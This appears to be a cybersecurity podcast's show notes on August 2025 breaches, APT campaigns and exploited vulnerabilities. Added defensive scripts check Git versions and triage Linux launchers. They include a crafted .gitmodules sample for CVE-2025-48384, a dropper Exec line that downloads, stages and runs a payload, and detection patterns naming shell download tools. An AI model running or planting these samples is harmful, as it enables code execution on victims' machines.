CISO Talk by James Azar
CyberHub Podcast
Auchan Retailer Data Breach, Nevada State Offices Halt Services After Major Cyber Incident, South Korea Arrests Hacker Accused of Targeting BTS, Maryland Cyberattack Disrupts Transit Services

From Auchan's 100K breach to Nevada's statewide outage - today's cyber landscape shows China fueling global crime while politicians play politics with our security

Good Morning Security Gang!


It’s Tuesday, August 26th, 2025, and welcome back to another loaded CyberHub Podcast episode. I’ve got my double espresso in hand and a packed slate of stories that touch on retail, state governments, China’s cybercrime machine, and mobile malware madness.

Today we’re talking about Auchan’s retail breach in France, cyber incidents disrupting Maryland and Nevada state services, Chinese espionage targeting diplomats, a hacker arrested in South Korea for targeting BTS and other celebrities, plus a Git flaw and two Citrix flaws newly added to CISA’s Known Exploited Vulnerabilities catalog, Android malware flooding Google Play, and more. Let’s dig right in.

“Trends matter in cybersecurity. Once attackers find systemic weaknesses, they’ll keep hammering until the return dries up.” James Azar

🇫🇷 Auchan Retail Breach Exposes 100K+ Loyalty Customers

French retail giant Auchan confirmed a breach exposing data from several hundred thousand loyalty accounts. No payment-card data or passwords were taken, but full names, titles, postal addresses, phone numbers, email addresses, and loyalty card numbers were. In isolation this might not seem like a “big deal,” but as I said on the show, trends matter. France has now seen Orange, Bouygues Telecom, Air France-KLM, and others hit in recent months, a sign that threat actors have found systemic weaknesses in French digital infrastructure and will keep working them.

🚌 Maryland Transit Administration Breach Hits Paratransit Services

The Maryland Transit Administration reported a cyberattack affecting the systems used to schedule paratransit trips. Core bus and rail service remains online, but the MobilityLink service, which serves riders with disabilities who cannot use fixed-route transit, is down. This disruption shows the real-world consequences of cyber incidents for vulnerable communities. The state activated its emergency operations center; no group has claimed responsibility.

🎰 Nevada State Government Incident Takes Offices Offline

Nevada announced a statewide cyber incident affecting multiple agency systems. Some in-person services were suspended, and phone lines that run over the state’s VoIP systems went dark. Emergency services, including 911, remain operational. This comes almost two years after MGM’s Las Vegas breach, raising concerns about Nevada’s recurring exposure. As I said on the show, why state agencies don’t maintain landline backups still baffles me.

“If your state services collapse because VoIP went down, you failed resilience planning 101—where’s your landline backup?” James Azar

🇨🇳 Chinese Espionage Campaign Targets Diplomats

Google’s Threat Intelligence Group reported that Chinese APT UNC6384 used an adversary-in-the-middle (AitM) position on captive portals to target diplomats across Southeast Asia. Victims connecting to a network were redirected to a page mimicking a VPN login or software update, which delivered a digitally signed malware loader that ultimately deployed a PlugX variant. This campaign follows Beijing’s long-running playbook: compromise diplomats for intelligence, blackmail material, and long-term geopolitical leverage.

"China's the head, not Russia, not Iran, not anywhere else. It all starts and ends in China. And if we really want to fight cybercrime and put a dent in it, then President Trump needs to get even tougher on China." James Azar

🎤 Cyber Criminal Arrested in South Korea for Targeting BTS & Executives

South Korea arrested a 34-year-old Chinese national accused of hacking telecom systems and stealing celebrity and executive data, including attempts against BTS singer Jungkook. The hacker siphoned $28.9M in assets by opening bank and crypto accounts under victims’ names. He was extradited from Thailand and admitted to some charges. This arrest underscores how China-backed cybercrime overlaps with financial fraud, fueling a global underground economy.

🛠 Git Vulnerability Exploited in the Wild

Git CVE-2025-48384 is now under active exploitation. The bug is in how Git handles a carriage return at the end of a configuration value: the reader strips it, but the writer does not quote it, so the value read back differs from the value written. A crafted .gitmodules whose submodule path carries a trailing carriage return can make a recursive clone (git clone --recurse-submodules) check the submodule out to an unexpected location, and with a symlink pointing that location at the submodule’s hooks directory, a post-checkout hook shipped in the malicious repository runs on the victim’s machine. Proof-of-concept exploits are public. Windows is unaffected, since NTFS rejects control characters in file names, but macOS and Linux users must patch immediately: Git 2.50.1 or the back-ported fixes for older minor lines, and remember that IDEs, CI runners, and package managers often bundle their own copy of Git.
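A pre-clone gate for this bug, as an added example that is not code from the Git project or from the show: it checks whether a git version string is at or beyond the fixed release for its minor line (the table of fixed releases is taken from the July 2025 Git security release, an assumption you should verify against your distribution’s advisory), and it scans a .gitmodules file as raw bytes for any control byte inside a submodule path value. The function names and the sample .gitmodules contents are mine and constructed for the demo. The scanner is deliberately strict: a .gitmodules that merely uses CRLF line endings is flagged too, because a pre-clone gate should send oddities to a human rather than let them through.

```python
"""Pre-clone checks for Git CVE-2025-48384.

Added example, not code from the Git project or from the CyberHub Podcast.
Assumptions: FIXED_RELEASES lists the July 2025 Git security release for each
2.x minor line; function names are mine; the sample .gitmodules contents are
constructed for the demo.
"""
from __future__ import annotations

import re
import subprocess

# Minimum patched micro version per Git 2.x minor line. Minor lines not listed
# here (2.42 and older) never received a fix and must move to a listed line.
FIXED_RELEASES = {43: 7, 44: 4, 45: 4, 46: 4, 47: 3, 48: 2, 49: 1, 50: 1}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def git_version_is_fixed(version: str) -> bool:
    """True if a 'git --version' string (e.g. 'git version 2.50.1') is patched."""
    m = _VERSION_RE.search(version)
    if not m:
        raise ValueError(f"unrecognised git version string: {version!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    micro = int(m.group(3) or 0)
    if major != 2:
        return major > 2
    if minor > 50:
        return True  # every release after 2.50.1 carries the fix
    fixed_micro = FIXED_RELEASES.get(minor)
    return fixed_micro is not None and micro >= fixed_micro


def installed_git_is_fixed() -> bool:
    """Ask the git binary on PATH for its version and check it."""
    out = subprocess.run(["git", "--version"], capture_output=True,
                         text=True, check=True).stdout
    return git_version_is_fixed(out)


# 'path = <value>' lines of a .gitmodules file; '.' matches CR but not LF.
_PATH_LINE = re.compile(rb"^[ \t]*path[ \t]*=[ \t]*(.*)$")
_CONTROL = re.compile(rb"[\x00-\x1f\x7f]")


def suspicious_submodule_paths(gitmodules: bytes) -> list[bytes]:
    """Return every submodule 'path' value that carries a control byte.

    The file must be handled as raw bytes: opening it in text mode with
    universal newlines would translate a CR away and hide the very byte we
    are looking for. Any CR in a path value is reported, including one that
    is only a CRLF line terminator; review those by hand.
    """
    hits = []
    for line in gitmodules.split(b"\n"):  # split on LF only so a CR survives
        m = _PATH_LINE.match(line)
        if m and _CONTROL.search(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed samples: a benign .gitmodules and one that smuggles a carriage
# return inside the quoted path value so it survives Git's config parser.
CLEAN_GITMODULES = (b'[submodule "lib"]\n'
                    b'\tpath = lib\n'
                    b'\turl = https://example.invalid/lib.git\n')
EVIL_GITMODULES = (b'[submodule "lib"]\n'
                   b'\tpath = "lib\r"\n'
                   b'\turl = https://example.invalid/lib.git\n')

if __name__ == "__main__":
    print("2.50.1 fixed:", git_version_is_fixed("git version 2.50.1"))
    print("clean:", suspicious_submodule_paths(CLEAN_GITMODULES))
    print("evil: ", suspicious_submodule_paths(EVIL_GITMODULES))
```

Run installed_git_is_fixed() on every build agent and developer image, not just laptops, and for untrusted repositories clone without --recurse-submodules first, run suspicious_submodule_paths() over the checked-out .gitmodules, and only then run git submodule update --init.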

⚡ Pakistani APT Targets Indian Defense via Linux Malware

APT-36 (Transparent Tribe, also tracked as Mythic Leopard), the Pakistan-linked group, ran a phishing campaign against Indian government and defense entities using Linux .desktop launcher files as droppers. The lure looks like a document, but the launcher’s Exec line runs a shell command that downloads the payload from Google Drive, opens a decoy, and sets up persistence; the implant adds anti-debugging checks and command-and-control over WebSockets. The takeaway: state-sponsored tooling is now purpose-built for Linux desktops, not just Windows.
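A triage script for launcher files of this kind, as an added example that is not code from the show or from any vendor report. The indicators are my own reading of the dropper pattern described above (an Application launcher named like a document whose Exec line spawns a shell, fetches a payload from a file-sharing URL, stages it in a temporary directory, marks it executable, backgrounds it, and hides all of this behind Terminal=false); the sample launchers, including the placeholder Google Drive URL, are constructed and are not real indicators.

```python
"""Heuristic triage of Linux .desktop launchers used as malware droppers.

Added example; not code from the podcast or from any vendor report. The
indicators are my own reading of the dropper pattern discussed above; the
sample launchers are constructed, including the placeholder Google Drive URL.
"""
from __future__ import annotations

import configparser
import re

# (regex applied to the Exec value, reason reported when it matches)
EXEC_SIGNALS = [
    (r"\b(?:ba|z|da)?sh\s+-c\b", "Exec spawns a shell with -c"),
    (r"\b(?:curl|wget)\b", "Exec downloads with curl or wget"),
    (r"https?://", "Exec contains a remote URL"),
    (r"drive\.google\.com|dropbox\.com", "Exec pulls from a file-sharing service"),
    (r"/tmp/|/dev/shm/|\$HOME/\.|~/\.", "Exec stages files in a temp dir or dotfile"),
    (r"\bchmod\s+(?:\+x|[0-7]*[1357][0-7]*)\b", "Exec marks a file executable"),
    (r"\bnohup\b|\bsetsid\b|\s&(?:\s|$)", "Exec backgrounds a process"),
    (r"base64\s+(?:-d|--decode)|\bxxd\s+-r", "Exec decodes an embedded payload"),
    (r"\bcrontab\b|systemctl\s+--user|autostart", "Exec installs persistence"),
]
SHELL_SIGNAL = EXEC_SIGNALS[0][0]
DOCUMENT_NAME = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|odt)\b", re.IGNORECASE)
DOCUMENT_ICON = re.compile(r"pdf|office|document", re.IGNORECASE)


def parse_desktop(text: str) -> dict[str, str]:
    """Return the [Desktop Entry] group as a dict; keys keep their case."""
    # .desktop files are INI-like; '%u'-style field codes must not be
    # interpolated, and '=' is the only key/value delimiter.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep 'Exec', 'Name[fr]' etc. as written
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def triage_desktop(text: str, filename: str = "") -> list[str]:
    """Return the reasons a launcher looks like a dropper; empty means none found."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    reasons = [why for pattern, why in EXEC_SIGNALS if re.search(pattern, exec_line)]
    if entry.get("Type", "Application") == "Application" and (
        DOCUMENT_NAME.search(entry.get("Name", "")) or DOCUMENT_NAME.search(filename)
    ):
        reasons.append("Application launcher named like a document")
    if reasons and DOCUMENT_ICON.search(entry.get("Icon", "")):
        reasons.append("Icon mimics a document while Exec is suspicious")
    if re.search(SHELL_SIGNAL, exec_line) and entry.get("Terminal", "false").lower() == "false":
        reasons.append("Shell command runs with Terminal=false, so the user sees nothing")
    return reasons


def is_likely_dropper(text: str, filename: str = "", threshold: int = 3) -> bool:
    """A threshold of three keeps a benign 'sh -c' launcher below the line."""
    return len(triage_desktop(text, filename)) >= threshold


# Constructed samples (not real indicators). The dropper mimics a PDF lure.
DROPPER = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -sL 'https://drive.google.com/uc?export=download&id=EXAMPLE' -o /tmp/.x && chmod +x /tmp/.x && nohup /tmp/.x >/dev/null 2>&1 & xdg-open /tmp/decoy.pdf"
"""
BENIGN_APP = """[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
Icon=firefox
Terminal=false
"""
BENIGN_SCRIPT = """[Desktop Entry]
Type=Application
Name=Notify
Exec=sh -c "notify-send hello"
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("dropper", DROPPER), ("firefox", BENIGN_APP), ("notify", BENIGN_SCRIPT)):
        print(label, is_likely_dropper(sample), triage_desktop(sample))
```

Point it at ~/.local/share/applications, ~/Desktop, ~/Downloads, and the autostart directories; the reasons list is what you want in the alert, since a single "spawns a shell" hit is common in legitimate launchers and only the combination with a document-style name and a download-and-stage chain is the dropper signature.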

📱 Android Malware Floods Google Play – 19M Installs

Zscaler ThreatLabz researchers uncovered 77 malicious apps with a combined 19 million installs on Google Play, spreading the Anatsa (also known as TeaBot) banking trojan, Joker billing-fraud malware, and assorted adware. Many posed as harmless utilities. The banking malware reads SMS messages, which is how it captures the one-time codes used for MFA, alongside banking credentials. Google pulled the apps, but only after millions of installs, which once again shows its vetting lags behind Apple’s walled-garden model.

🔒 Citrix Vulnerabilities Added to CISA KEV Catalog

Two Citrix Session Recording flaws, CVE-2024-8068 and CVE-2024-8069, were added to CISA’s Known Exploited Vulnerabilities catalog alongside the Git bug. CVE-2024-8068 lets an authenticated user in the same Windows Active Directory domain as the Session Recording server escalate to the NetworkService account; CVE-2024-8069 is a limited remote code execution via deserialization of untrusted data, again with NetworkService privileges. Citrix patched both in November 2024, so exploitation now is hitting organizations that never applied the hotfix. Federal agencies must remediate by the BOD 22-01 due date, and enterprises should treat these with the same urgency.

⚖ Senator Wyden Grandstands Over Judiciary Breach

Senator Ron Wyden is again holding up the confirmation of Sean Plankey, the nominee for CISA director, demanding more disclosure about the federal judiciary breach and the telecom breaches. I said it on the show: grandstanding doesn’t fix breaches. What would help? Passing federal data privacy and breach notification laws. Until then, we’re patching with politics instead of policy.

🧠 James Azar’s CISO Take

Today’s stories are a reminder that resilience and geopolitics now dominate cybersecurity. From Maryland’s paratransit outage to Nevada’s VoIP collapse, basic continuity planning is still being skipped. Meanwhile, China’s campaigns against diplomats and the hacker who siphoned millions in South Korea show how espionage and crime are converging.

The other theme is maturity in patching and policy. Git, Citrix, Android—vulnerabilities don’t stop, but exploit timelines are shrinking. Federal KEV enforcement helps, but enterprises need to adopt the same urgency. And on the policy side, it’s time for the U.S. to stop posturing and pass consistent data privacy and breach notification standards. Until then, CISOs are left explaining why trends matter—to boards, to regulators, and to customers—while adversaries exploit the gaps.

✅ Action Items

  • 🔐 Patch Git (CVE-2025-48384) on macOS/Linux immediately: upgrade to 2.50.1 or the back-ported fix for your minor line, and include the Git bundled with IDEs, CI runners, and package managers.

  • 🛡 Apply Citrix’s Session Recording hotfixes for CVE-2024-8068/8069; they have been available since November 2024.

  • 📲 Audit mobile device policies—block unauthorized app installs.

  • 🚌 Build continuity plans for critical citizen-facing services (landlines as VoIP backups).

  • 🌐 Hunt for APT-36’s Linux .desktop-file droppers on defense and government endpoints.

  • 📡 Monitor Chinese PlugX and captive portal TTPs in diplomatic/enterprise networks.

  • 📜 Push for federal breach notification and privacy laws to reduce patchwork compliance.

That's our show for today, security gang. We'll be back tomorrow at 9 AM Eastern live with all the latest cybersecurity news. Make sure to subscribe, follow, share, like, and comment.

Stay cyber safe, and remember - we love feedback!

